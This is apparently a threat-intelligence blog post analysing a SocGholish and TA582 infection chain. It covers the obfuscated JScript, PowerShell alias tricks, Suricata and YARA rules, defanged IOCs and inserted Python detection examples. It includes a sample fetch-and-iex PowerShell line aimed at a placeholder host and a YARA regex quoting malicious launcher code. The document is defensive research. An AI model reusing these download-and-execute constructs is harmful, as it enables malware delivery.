Intro
This is the long form of my post from here: https://x.com/MalasadaTech/status/1924982337689027063. While browsing urlscan scan tasks, I found crypto-js.min.js being used for obfuscation on a page that Any Run links to Tycoon and Storm1747. That sparked a hunch that led me to TA569 infrastructure and SocGholish. This post may be more wordy than usual, as it documents my analysis process and how I kind of jump from one thing to another.
Tactical Pause
THE CONTENT, VIEWS, AND OPINIONS EXPRESSED ON THIS DOCUMENT ARE MY OWN AND DO NOT REFLECT THOSE OF MY EMPLOYER OR ANY AFFILIATED ORGANIZATIONS. ALL RESEARCH, ANALYSIS, AND WRITING ARE CONDUCTED ON MY PERSONAL TIME AND USING MY OWN PERSONALLY-ACQUIRED RESOURCES. ANY REFERENCES, TOOLS, OR SOFTWARE MENTIONED HERE ARE LIKEWISE USED INDEPENDENTLY AND ARE NOT ASSOCIATED WITH, ENDORSED, OR FUNDED BY MY EMPLOYER.
Flow
I was hunting for scan tasks that use “crypto-js.min.js” via this urlscan query: https://urlscan.io/search/#filename:%22crypto-js.min.js%22
I hunt on that library because phishing sites use it to encrypt the malicious parts of the page, which only get decrypted in the victim's browser.
Here’s a phishing example: https://urlscan.io/result/0196f52e-dfe7-7737-9286-3e1b961a4f0e/#summary. The response here: https://urlscan.io/responses/93e7e44476d64ef928ec053670fda65d4ffa84379f7388853c645165217f33fc/ shows the decryption function to decrypt the malicious code:

The example above was interesting because of the unusual fake captcha. It’s a fake captcha style that I have not seen before.

The graphic appears to be copied from here: https://www.freepik.com/premium-vector/graphic-design-flat-illustration_151473686.htm

The gist of that one is that it takes you to a phishing site after you click the fake captcha. Here’s an Any Run session that shows the flow: https://app.any.run/tasks/be164f53-1b5f-411c-b49d-a5f44cd6cd32

It is flagged as Tycoon/Storm1747.

That’s the general idea of it. I won’t go into more detail on that one here, but it got me wondering if there were any scan tasks that have abnormal page titles. I started with “update chrome” using this query: https://urlscan.io/search/#page.title%3A%22update%20chrome%22. A hit there would be particularly weird because, from what I’ve observed, TA569 uses TDSs that I don’t normally see rendering the “Update Chrome” landing page for a scanner. After skimming a bajillion results (8 at the time) I observed that look.studiodeux[.]com looked like a SocGholish lookalike.

Here’s the scan result: https://urlscan.io/result/01967ce2-72b9-704a-b88b-d9c826cca6de/#summary

I identified the key part here, which appears to be Parrot TDS: https://urlscan.io/responses/54fe0bbd46949e427e32e42be755c0ce5557cb6794aa6960405cd051cf1448d4/


I pivoted on this hash to search for other results: https://urlscan.io/search/#hash%3A54fe0bbd46949e427e32e42be755c0ce5557cb6794aa6960405cd051cf1448d4

I was unable to repeat the steps on the first two results. The first compromised site may have been cleaned up. I was able to get served the SocGholish landing page from the third in the Any Run session here: https://app.any.run/tasks/4b69b12e-3f1f-41c0-8404-c0efae4c5803

I have a few callouts before continuing. I already mentioned that it’s weird for the landing page to render in urlscan; it’s also weird that it rendered in Any Run, and, something I haven’t mentioned yet, it’s weird that the follow-on activity from the fake update JS was not filtered out in this Any Run session. I normally don’t get these to go this far.
I had the MITM proxy enabled, so you can download the PCAP and the SSL Keys to follow along.
In stream 36, it first requests the obfuscated JS that makes the first attempt to filter out analysis environments.

Later in the stream, since the checks were successful, it will send the request for the landing page content.

Stream 61 shows the request and response for the malicious JS. It is notably smaller than what I remember in the past.

In addition to that, you can see that the filename uses non-ASCII Unicode characters:
var filename="Chr\u03bfmeU\u0440d\u0430teInst\u0430ller.js"
Just by looking at it you can see they’re substituting the o, the p, and the a characters: \u03bf is Greek small omicron, \u0440 is Cyrillic small er, and \u0430 is Cyrillic small a. The rendered name looks like ChromeUpdateInstaller.js, but a plain string match on that ASCII name will not hit it.
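To show what that substitution does to a string match, here is an added Python example (mine, not code from the post or from the malware) that decodes the JS \uXXXX escapes, reports which scripts the letters come from, and reduces the name to an ASCII skeleton using a small, hand-picked confusables table (an assumption, not the full Unicode confusables list). Only the filename literal comes from the post; the lure list is an assumption.

```python
import re
import unicodedata

# Partial confusables table: non-Latin letters that render like ASCII Latin ones.
# Assumed, hand-picked subset; the full Unicode confusables data is much larger.
CONFUSABLES = {
    "\u03bf": "o",  # GREEK SMALL LETTER OMICRON
    "\u03b1": "a",  # GREEK SMALL LETTER ALPHA
    "\u0430": "a",  # CYRILLIC SMALL LETTER A
    "\u0435": "e",  # CYRILLIC SMALL LETTER IE
    "\u043e": "o",  # CYRILLIC SMALL LETTER O
    "\u0440": "p",  # CYRILLIC SMALL LETTER ER
    "\u0441": "c",  # CYRILLIC SMALL LETTER ES
    "\u0443": "y",  # CYRILLIC SMALL LETTER U
    "\u0445": "x",  # CYRILLIC SMALL LETTER HA
    "\u0456": "i",  # CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
}


def decode_js_unicode(literal: str) -> str:
    """Turn the \\uXXXX escapes of a JS string literal into real characters."""
    return re.sub(r"\\u([0-9a-fA-F]{4})",
                  lambda m: chr(int(m.group(1), 16)), literal)


def script_of(ch: str) -> str:
    """First word of the Unicode character name (LATIN, CYRILLIC, GREEK, ...)."""
    name = unicodedata.name(ch, "")
    return name.split(" ", 1)[0] if name else "UNKNOWN"


def analyze_filename(js_literal: str) -> dict:
    """Decode the literal, flag mixed scripts and build an ASCII skeleton."""
    decoded = decode_js_unicode(js_literal)
    scripts, substitutions, skeleton = set(), [], []
    for pos, ch in enumerate(decoded):
        if ch.isalpha():
            scripts.add(script_of(ch))
        ascii_equiv = CONFUSABLES.get(ch)
        if ascii_equiv is None:
            skeleton.append(ch)
        else:
            skeleton.append(ascii_equiv)
            substitutions.append((pos, f"U+{ord(ch):04X}",
                                  unicodedata.name(ch), ascii_equiv))
    return {
        "decoded": decoded,
        "skeleton": "".join(skeleton),
        "scripts": sorted(scripts),
        "mixed_script": len(scripts) > 1,
        "substitutions": substitutions,
    }


def matches_lure(js_literal: str, lure_names: set[str]) -> bool:
    """Match on the ASCII skeleton so homoglyph variants of a known lure still hit."""
    skeleton = analyze_filename(js_literal)["skeleton"].lower()
    return skeleton in {n.lower() for n in lure_names}


# Filename literal as it appears in the SocGholish JScript discussed in the post.
OBSERVED = r"Chr\u03bfmeU\u0440d\u0430teInst\u0430ller.js"
# Assumed watchlist of lure names worth alerting on.
LURES = {"ChromeUpdateInstaller.js"}

if __name__ == "__main__":
    info = analyze_filename(OBSERVED)
    print(info["decoded"], "->", info["skeleton"], info["scripts"])
    for sub in info["substitutions"]:
        print("  ", sub)
    print("naive match:", "ChromeUpdateInstaller.js" in info["decoded"])  # False
    print("skeleton match:", matches_lure(OBSERVED, LURES))               # True
```

The point of the skeleton is that a detection keyed on the rendered-looking name survives the swap; a detection keyed on the raw bytes does not. The mixed-script flag is a cheap generic signal on its own, since legitimate installer filenames rarely mix Latin, Greek and Cyrillic letters.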
You can’t deobfuscate the malicious JScript code in deobfuscate.io to extract the next stage URL anymore. It’s cool though, because Grok can provide the next stage domain. The path it gave was shorter than the real one (profile vs the correct profileLayout), but it’s close enough.

This is confirmed in the Any Run DNS Requests.

You could also validate this in the HTTP stream 73.

The PCAP shows the JScript code POSTs a string value, likely used to ensure a request only gets one response, and the response is code to enumerate the environment and send the results in a POST. We can see the follow-up POST that includes the enumerated data. The response to that POST is shown in the snip below.

We can see that the POST response is more JScript. It has an interesting part.

In the snip above, it’s highly obfuscated, but it creates a WScript.Shell object to execute PowerShell, and that PowerShell creates the new alias “printout” for curl (as the YARA rule at the end shows, even the string curl is assembled at runtime from “c”, a variable holding “ur”, and “l”). Mind you that curl is already an alias for Invoke-WebRequest (or IWR) in Windows PowerShell 5.1; PowerShell 7 dropped that alias. Why is this important? You might monitor for curl, Invoke-WebRequest, and IWR, but you most likely aren’t monitoring for “printout” usage. You should monitor for logs that show when an alias is created.
Moving back to the Any Run session, we can see that the PowerShell Script tracer shows the first function log is “new-alias printout curl”.

Back in the PCAP, a few lines below we can see that the alias printout is used with the -useb (short for -UseBasicParsing) parameter on a variable that is obfuscated. Circling back to the topic of monitoring for curl, Invoke-WebRequest, and IWR: it could be possible to catch this current implementation by monitoring for PowerShell commands that contain the -useb parameter but don’t contain curl, Invoke-WebRequest, or IWR. This would only work for the current implementation, since the parameter prefix is as easy to change as the alias name.
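To make the two monitoring ideas above concrete (alias creation for download/execution cmdlets, and -useb used with a command word that is not a known cmdlet), here is an added Python triage example over script-block text of the kind PowerShell writes to event 4104. This is my own code, not the post’s or the actor’s; the script blocks below are constructed to mirror the printout and gotoany tricks, they are not the real payload, and the statement splitting is a crude heuristic, not a PowerShell parser.

```python
import re

# Cmdlets and built-in aliases most shops already alert on (assumed watchlist).
DOWNLOAD_CMDS = {"curl", "iwr", "invoke-webrequest", "wget", "irm", "invoke-restmethod"}
EXEC_CMDS = {"iex", "invoke-expression"}
ALIAS_CMDS = {"new-alias", "set-alias", "nal", "sal"}


def split_statements(script: str) -> list[str]:
    """Crude split on ';', '|' and newlines: enough for log triage, not a PS parser."""
    return [s.strip() for s in re.split(r"[;|\r\n]+", script) if s.strip()]


def command_word(stmt: str) -> tuple[str, list[str]]:
    """Strip a leading '(' or '$var =' assignment; return (command, remaining tokens)."""
    stmt = re.sub(r"^[\s(]*(?:\$\w+\s*=\s*)?", "", stmt)
    tokens = stmt.split()
    if not tokens:
        return "", []
    return tokens[0].lstrip("&").lower(), tokens[1:]


def triage_scriptblock(script: str) -> list[tuple[str, str, str]]:
    """Return (finding, statement, detail) tuples for one script block."""
    findings = []
    aliases: dict[str, str] = {}  # alias name -> target, as written in the script
    for stmt in split_statements(script):
        cmd, rest = command_word(stmt)
        if not cmd:
            continue
        if cmd in ALIAS_CMDS:
            # Works for positional form and for -Name x -Value y (switches dropped).
            args = [t for t in rest if not t.startswith("-")]
            if len(args) >= 2:
                name, target = args[0].lower(), args[1]
                aliases[name] = target.lower()
                if target.lower() in DOWNLOAD_CMDS | EXEC_CMDS:
                    findings.append(("alias_for_monitored_cmd", stmt, f"{name} -> {target}"))
                elif re.search(r"[$()`+]", target):
                    # Target built at runtime (c$($v)l style): cannot resolve, so flag it.
                    findings.append(("alias_with_obfuscated_target", stmt, f"{name} -> {target}"))
            continue
        resolved = aliases.get(cmd, cmd)
        # -useb is the shortest unambiguous prefix of -UseBasicParsing.
        if any(t.lower().startswith("-useb") for t in rest) and cmd not in DOWNLOAD_CMDS:
            findings.append(("useb_without_known_cmd", stmt, f"{cmd!r} resolves to {resolved!r}"))
        if cmd in EXEC_CMDS or resolved in EXEC_CMDS:
            findings.append(("invoke_expression", stmt, f"{cmd!r} resolves to {resolved!r}"))
    return findings


# Constructed script-block texts; they mirror the tricks described in the post.
SAMPLES = {
    "benign_admin": "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB",
    "printout_alias": "$abcdef='ur';new-alias printout c$($abcdef)l;"
                      "$x=printout -useb 'http://example.invalid/f15.svg';iex $x",
    "gotoany_alias": "set-alias gotoany iex;('Start-Sleep 15') | gotoany",
}

if __name__ == "__main__":
    for label, text in SAMPLES.items():
        print(label)
        for kind, stmt, detail in triage_scriptblock(text):
            print(f"  {kind:30} {detail:40} <- {stmt}")
```

Because the alias table is built while walking the block, a later bare “gotoany” resolves to iex and is flagged even though the token iex never appears in that statement. The obfuscated-target check is the fallback for the case the post shows, where the target string itself is assembled at runtime and cannot be resolved statically.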

In Any Run, we can see that the deobfuscated URL is “hxxp[:]//nzyeyghzrr333b[.]top/f15.svg”

In the PCAP, you can verify that stream 74 is indeed plaintext HTTP over port 80.

This is cool because detections can be made for this activity.

More on that later. The file is an obfuscated PowerShell script, not an SVG. Back in Any Run we can see that it is executed at number 35 via iex, and the first command is to sleep for 15 seconds.

After it’s all deobfuscated, it will perform enumeration tasks.

Later at number 903, it runs a curl for hjdfikgmhficchm[.]top using the TA582 URL pattern.

I searched the PCAP for this traffic, but was surprised to see there was already traffic to this host before that point. It is interesting because the response payload for the first request doesn’t show when you view it as an HTTP stream. The first request is the request for hxxp[:]//hjdfikgmhficchm[.]top/h%20jziok%20g.php?s=515.

When you follow the TCP stream, you can see it.

I took note of the first variable in the payload, qpyoiaewrncj, and searched for it in the PowerShell Script tracer.

I was wondering what 7dlw3kq was. It’s an alias for Invoke-Expression.

I checked the end of the script and observed that it is piped to “gotoany”.

gotoany is an alias for iex.

The alias was set just a bit earlier in the same script. The “set-alias gotoany” part is not obfuscated, but the “iex” part is.

After that executes, it sends the GET request to hxxp[:]//hjdfikgmhficchm[.]top/keqvs806thhtr.php?id=DESKTOP-JGLLJLD&key=55773794640&s=515. In previous reporting, located here: https://malasada.tech/updated-landupdate808-analysis/, I identified that TA582 performs enumeration commands, assigns numerical values to the results, adds them up, and returns the sum as the key. I assess that the key value is a scoring technique to determine whether the activity is from an ideal target system or not. If it is not, the TA582 server will return a fake or decoy resource. In the PCAP snip below, we can see that the decoy is hxxp[:]//hgccpszb1sbaho2[.]com.

The buck stops here because that domain doesn’t exist, and the script execution errors out.
Summary
This documented my thoughts and the steps I took while browsing for malicious activity. It was a bit more wordy because I’m showing my steps; it’s more of a bloggy type of post and not so much a refined post. It started with me reviewing urlscan results that use “crypto-js.min.js” for malicious obfuscation. That led me to an unusual fake captcha that is flagged as Tycoon and Storm1747 in Any Run. I made the hypothesis that there may be urlscan tasks that include “Update Chrome” in the page title. I found one result that used TA569 infra to load the SocGholish landing page. From there, I pivoted on the Parrot TDS hash to find two other scan tasks. Of the three, one was still compromised with SocGholish, and I was able to interact with it in Any Run. From the Any Run session, I was able to observe that after the normal SocGholish JScript file, it uses TA582 infrastructure. The TA582 infrastructure served a few scripts, but then served a decoy resource on the last step that we got to. I’ve made some practice Suricata and YARA rules below. Use them with the understanding that these are sort of practice detections, and that you might need to tune them.
Rules
Suricata Rules:
alert http $HOME_NET any -> $EXTERNAL_NET 80 (msg:"TA582 Request for f15.svg"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/f15.svg"; http.user_agent; content:"WindowsPowerShell"; http.host; content:".top"; endswith; sid:1000016; rev:1;)
alert http $HOME_NET any -> $EXTERNAL_NET 80 (msg:"TA582 outbound check-in v1"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"|2E|php|3F|s|3D|"; http.host; content:".top"; endswith; sid:1000017; rev:1;)
alert http $HOME_NET any -> $EXTERNAL_NET 80 (msg:"TA582 outbound check-in v2"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"|2E|php|3F|id|3D|"; http.uri; content:"|26|key|3D|"; http.uri; content:"|26|s|3D|"; http.user_agent; content:"WindowsPowerShell"; http.host; content:".top"; endswith; sid:1000018; rev:1;)
YARA Rules:
Note: I’ve tested these on my dev VM, and I’ve confirmed they match the intended malicious scripts. However, the first rule appears to return many false positives on UnpacMe, and the second YARA rule returns nothing in UnpacMe. The third rule was only tested on my dev VM. I’m limited on options to test under my “MalasadaTech” persona, so keep in mind that these are more conceptual rules that would need tuning.
rule SuspiciousPowerShellObfuscationTA582 {
meta:
author = "MalasadaTech"
description = "Suspicious PowerShell Obfuscation rule that checks for keywords that would indicate a large PS script is obfuscated. This matches on the f15.svg file."
strings:
$join = "join" nocase
$char_array = "char" nocase
$sleep = "start-sleep" nocase
condition:
(#join >= 50 or #char_array >= 30 or #sleep >= 2)
}
rule SuspiciousPowerShellPatternsTA582 {
meta:
author = "MalasadaTech"
description = "Suspicious PowerShell Patterns rule that checks for keywords that would indicate a large TA582 PS script is obfuscated. This matches on the response from the /h%20jziok%20g.php?s=515 request."
strings:
$s1 = "$executioncontext" nocase
$s2 = "substring" nocase
$s3 = "[System.Text.Encoding]::ascii" nocase
$s4 = "[system.String]::new" nocase
$s5 = "set-alias" nocase
$s6 = "[char[]]" nocase
condition:
all of ($s1, $s2, $s3, $s4, $s5) and #s6 >= 5
}
rule TA569_Last_Step {
meta:
description = "Detects VBScript used in TA569 last step, executing obfuscated PowerShell"
author = "MalasadaTech"
date = "2025-05-24"
strings:
// Core VBScript sequence with wildcard for execFileName
$vbscript_core = /var initExeption='0';var runFileExeption='';var runFileResult='';var execFileName='[0-9a-f]+\.ps1';var fs=new ActiveXObject\("Scripting\.FileSystemObject"\);var _tempFilePathExec=fs\.GetSpecialFolder\(2\)\+"\\\\"\+execFileName;if\(initExeption=='0'\)\{try\{var wsh=new ActiveXObject\("WScript\.Shell"\);runFileResult=wsh\.Run\('powershell \$[a-zA-Z]{6}=\\'ur\\';new-alias printout c\$\(\$[a-zA-Z]{6}\)l;/ nocase
condition:
$vbscript_core
}
IOCs
173.44.141[.]44
store.alignfrisco[.]com
app.nerduptechnology[.]com
hjdfikgmhficchm[.]top
hgccpszb1sbaho2[.]com
hxxps[:]//store.alignfrisco[.]com/49U5SZj3WiCH9wN71uUVa5H3A2uAsFEwjaZdJo64SzvBqA==
hxxps[:]//store.alignfrisco[.]com/FpEqsG2zSdlysxCCI6EGkmXlT8A0qwjRePBGyWz0ddZmswaSZLMQknngQNZk81vEZ+Fe13/wUNFx/kWSaw==
hxxps[:]//store.alignfrisco[.]com/v/UzysTXUKPb1wn4isUf6MyBVrqdzxGm3ptXo9GSbLnLlEe5ndkRucvXCfuT10HohddQqNCXULLXnEe42oJDrdKSWLPP104=
hxxps[:]//store.alignfrisco[.]com/RBeyPz810VYgNYgNcSeeHTdj109mLZBTJXnWVipw7UwwdsZMZjuQTDA1iAxoNcAdfjXISTF71FowNc8=
hxxps[:]//app.nerduptechnology[.]com/profileLayout
hxxp[:]//nzyeyghzrr333b[.]top/f15.svg
hxxp[:]//hjdfikgmhficchm[.]top/h%20jziok%20g.php?s=515
hxxp[:]//hjdfikgmhficchm[.]top/keqvs806thhtr.php?id={computer_name}&key={key}&s=515